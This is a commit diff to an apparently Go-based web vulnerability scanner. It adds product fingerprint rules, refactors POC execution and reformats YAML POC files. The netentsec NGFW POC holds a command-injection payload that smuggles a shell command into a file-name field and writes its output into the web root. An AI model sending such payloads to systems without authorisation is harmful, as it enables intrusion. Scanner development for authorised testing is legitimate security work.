更新指纹,修改poc的bug

WebScan/WebScan.go

@@ -14,27 +14,28 @@ var Pocs embed.FS
 
 func WebScan(info *common.HostInfo) {
 	var pocinfo = common.Pocinfo
-	buf := strings.Split(info.Url,"/")
+	buf := strings.Split(info.Url, "/")
-	pocinfo.Target = strings.Join(buf[:3],"/")
+	pocinfo.Target = strings.Join(buf[:3], "/")
-	for _,infostr := range info.Infostr {
+	if pocinfo.PocName != "" {
+		Execute(pocinfo)
+		return
+	}
+	for _, infostr := range info.Infostr {
 		pocinfo.PocName = lib.CheckInfoPoc(infostr)
-		err := Execute(pocinfo)
+		Execute(pocinfo)
-		if err != nil {
-			errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
-			common.LogError(errlog)
-		}
 	}
 }
 
-func Execute(PocInfo common.PocInfo) error {
+func Execute(PocInfo common.PocInfo) {
 	req, err := http.NewRequest("GET", PocInfo.Target, nil)
 	if err != nil {
-		return err
+		errlog := fmt.Sprintf("[-] webtitle %v %v", PocInfo.Target, err)
+		common.LogError(errlog)
+		return
 	}
 	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
 	if PocInfo.Cookie != "" {
 		req.Header.Set("Cookie", PocInfo.Cookie)
 	}
 	lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
-	return nil
 }

WebScan/info/rules.go

@@ -12,8 +12,8 @@ type Md5Data struct {
 }
 
 type PocData struct {
-	Name	string
+	Name  string
-	Alias	string
+	Alias string
 }
 
 var RuleDatas = []RuleData{
@@ -120,6 +120,7 @@ var RuleDatas = []RuleData{
 	{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
 	{"Jboss", "headers", "(JBoss)"},
 	{"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"},
+	{"泛微E-Mobile", "headers", "(EMobileServer)"},
 	{"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"},
 	{"ThinkPHP", "headers", "(ThinkPHP)"},
 	{"ThinkPHP", "code", "(/Public/static/js/)"},
@@ -136,6 +137,11 @@ var RuleDatas = []RuleData{
 	{"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
 	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization)"},
 	{"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
+	{"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"},
+	{"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"},
+	{"Hadoop Applications", "code", "(/cluster/app/application)"},
+	{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
+	{"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"},
 }
 
 var Md5Datas = []Md5Data{
@@ -162,15 +168,17 @@ var Md5Datas = []Md5Data{
 }
 
 var PocDatas = []PocData{
-	{"致远OA","seeyon"},
+	{"致远OA", "seeyon"},
-	{"泛微OA","weaver-oa"},
+	{"泛微OA", "weaver-oa"},
-	{"通达OA","tongda"},
+	{"通达OA", "tongda"},
-	{"ThinkPHP","thinkphp"},
+	{"ThinkPHP", "thinkphp"},
-	{"Nexus","nexus"},
+	{"Nexus", "nexus"},
-	{"齐治堡垒机","qizhi"},
+	{"齐治堡垒机", "qizhi"},
-	{"weaver-ebridge","weaver-ebridge"},
+	{"weaver-ebridge", "weaver-ebridge"},
-	{"weblogic","weblogic"},
+	{"weblogic", "weblogic"},
-	{"zabbix","zabbix"},
+	{"zabbix", "zabbix"},
-	{"VMware vSphere","vmware"},
+	{"VMware vSphere", "vmware"},
-	{"Jboss","jboss"},
+	{"Jboss", "jboss"},
-}
+	{"用友NC", "yongyou"},
+	{"用友IUFO", "yongyou"},
+}

WebScan/pocs/jumpserver-unauth-rce2.yml

@@ -2,7 +2,7 @@ name: poc-yaml-jumpserver-unauth-rce
 set:
   r1: randomLowercase(5)
 rules:
-    - method: GET
+  - method: GET
     path: /api/v1/users/connection-token/
     follow_redirects: false
     expression: |

WebScan/pocs/netentsec-ngfw-rce.yml

@@ -7,7 +7,8 @@ set:
 rules:
   - method: POST
     path: /directdata/direct/router
-    body: {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
+    body: >-
+      {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
     expression: response.status == 200
   - method: GET
     path: /{{r2}}